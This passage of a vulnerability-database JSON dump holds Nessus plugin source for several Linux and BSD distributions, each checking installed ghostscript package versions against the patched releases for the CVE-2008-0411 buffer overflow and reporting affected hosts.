value:\"http://www.nessus.org/u?09b46b86\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ghostscript-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:hpijs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"ghostscript-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ghostscript-devel-7.05-32.1.13\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"hpijs-1.3-32.1.13\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"ghostscript-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"ghostscript-7.07-33.2.c4.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"ghostscript-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"ghostscript-devel-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"ghostscript-devel-7.07-33.2.c4.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"ghostscript-devel-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"ghostscript-gtk-7.07-33.2.el4_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"ghostscript-gtk-7.07-33.2.c4.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"ghostscript-gtk-7.07-33.2.el4_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"ghostscript-8.15.2-9.1.el5_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ghostscript-devel-8.15.2-9.1.el5_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ghostscript-gtk-8.15.2-9.1.el5_1.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript / ghostscript-devel / ghostscript-gtk / hpijs\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:21", "description": "New espgs or ghostscript packages are available for 11.0, 12.0, and\n-current to fix a buffer overflow.", "edition": 22, "published": "2008-03-04T00:00:00", "title": "Slackware 11.0 / 12.0 / current : espgs/ghostscript (SSA:2008-062-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-03-04T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "p-cpe:/a:slackware:slackware_linux:ghostscript", "p-cpe:/a:slackware:slackware_linux:espgs", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2008-062-01.NASL", "href": "https://www.tenable.com/plugins/nessus/31324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2008-062-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31324);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"SSA\", value:\"2008-062-01\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / current : espgs/ghostscript (SSA:2008-062-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New espgs or ghostscript packages are available for 11.0, 12.0, and\n-current to fix a buffer overflow.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.370633\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65264f3c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected espgs and / or ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:espgs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"espgs\", pkgver:\"8.15.3svn185\", pkgarch:\"i486\", pkgnum:\"3_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"espgs\", pkgver:\"8.15.4\", pkgarch:\"i486\", pkgnum:\"3_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ghostscript\", pkgver:\"8.62\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:50:04", "description": "Chris Evans from the Google Security Team reports :\n\nSeverity: parsing of evil PostScript file will result in arbitrary\ncode execution.\n\nA stack-based buffer overflow in the zseticcspace() function in zicc.c\nallows remote arbitrary code execution via a malicious PostScript file\n(.ps) that contains a long Range array.", "edition": 25, "published": "2008-03-07T00:00:00", "title": "FreeBSD : ghostscript -- zseticcspace() function buffer overflow vulnerability (ca8e56d5-e856-11dc-b5af-0017319806e7)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-03-07T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ghostscript-gpl", "p-cpe:/a:freebsd:freebsd:ghostscript-gpl-nox11"], "id": "FREEBSD_PKG_CA8E56D5E85611DCB5AF0017319806E7.NASL", "href": "https://www.tenable.com/plugins/nessus/31376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31376);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n\n script_name(english:\"FreeBSD : ghostscript -- zseticcspace() function buffer overflow vulnerability (ca8e56d5-e856-11dc-b5af-0017319806e7)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans from the Google Security Team reports :\n\nSeverity: parsing of evil PostScript file will result in arbitrary\ncode execution.\n\nA stack-based buffer overflow in the zseticcspace() function in zicc.c\nallows remote arbitrary code execution via a malicious PostScript file\n(.ps) that contains a long Range array.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://scary.beasts.org/security/CESA-2008-001.html\"\n );\n # https://vuxml.freebsd.org/freebsd/ca8e56d5-e856-11dc-b5af-0017319806e7.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b9a1df3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ghostscript-gpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ghostscript-gpl-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ghostscript-gpl<8.61_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ghostscript-gpl-nox11<8.61_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:44:13", "description": "A stack-based buffer overflow was fixed in the ghostscript\ninterpreter, which potentially could be used to execute code or at\nleast crash ghostscript. (CVE-2008-0411)", "edition": 23, "published": "2008-02-29T00:00:00", "title": "SuSE 10 Security Update : Ghostscript (ZYPP Patch Number 4984)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-02-29T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_GHOSTSCRIPT-FONTS-OTHER-4984.NASL", "href": "https://www.tenable.com/plugins/nessus/31321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31321);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0411\");\n\n script_name(english:\"SuSE 10 Security Update : Ghostscript (ZYPP Patch Number 4984)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stack-based buffer overflow was fixed in the ghostscript\ninterpreter, which potentially could be used to execute code or at\nleast crash ghostscript. (CVE-2008-0411)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0411.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4984.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"ghostscript-fonts-other-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"ghostscript-fonts-std-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"ghostscript-library-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"ghostscript-x11-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"libgimpprint-4.2.7-62.13.6\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-fonts-other-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-fonts-rus-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-fonts-std-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-library-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-omni-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"ghostscript-x11-8.15.3-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"libgimpprint-4.2.7-62.13.6\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"libgimpprint-devel-4.2.7-62.14.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:50", "description": "Chris Evans found a buffer overflow condition in Ghostscript, which\ncan lead to arbitrary code execution as the user running any\napplication using it to process a maliciously crafted Postscript file.\n\nThe updated packages have been patched to prevent this issue.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : ghostscript (MDVSA-2008:055)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libgs8-devel", "p-cpe:/a:mandriva:linux:ghostscript-doc", "cpe:/o:mandriva:linux:2007", "p-cpe:/a:mandriva:linux:lib64gs8", "cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:ghostscript-X", "p-cpe:/a:mandriva:linux:libgs8", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:ghostscript", "p-cpe:/a:mandriva:linux:libijs1", "p-cpe:/a:mandriva:linux:lib64ijs1-devel", "p-cpe:/a:mandriva:linux:ghostscript-module-X", "p-cpe:/a:mandriva:linux:lib64gs8-devel", "p-cpe:/a:mandriva:linux:ghostscript-common", "p-cpe:/a:mandriva:linux:lib64ijs1", "p-cpe:/a:mandriva:linux:libijs1-devel", "p-cpe:/a:mandriva:linux:ghostscript-dvipdf"], "id": "MANDRIVA_MDVSA-2008-055.NASL", "href": "https://www.tenable.com/plugins/nessus/37312", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:055. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37312);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"MDVSA\", value:\"2008:055\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ghostscript (MDVSA-2008:055)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans found a buffer overflow condition in Ghostscript, which\ncan lead to arbitrary code execution as the user running any\napplication using it to process a maliciously crafted Postscript file.\n\nThe updated packages have been patched to prevent this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript-X\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript-dvipdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ghostscript-module-X\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gs8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gs8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ijs1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ijs1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgs8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgs8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libijs1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libijs1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ghostscript-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ghostscript-X-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ghostscript-common-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ghostscript-dvipdf-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"ghostscript-module-X-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64gs8-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64gs8-devel-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64ijs1-0.35-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64ijs1-devel-0.35-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libgs8-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libgs8-devel-8.15-47.1mdv2007.0\", yank:\"mdv\")) flag++;\nif 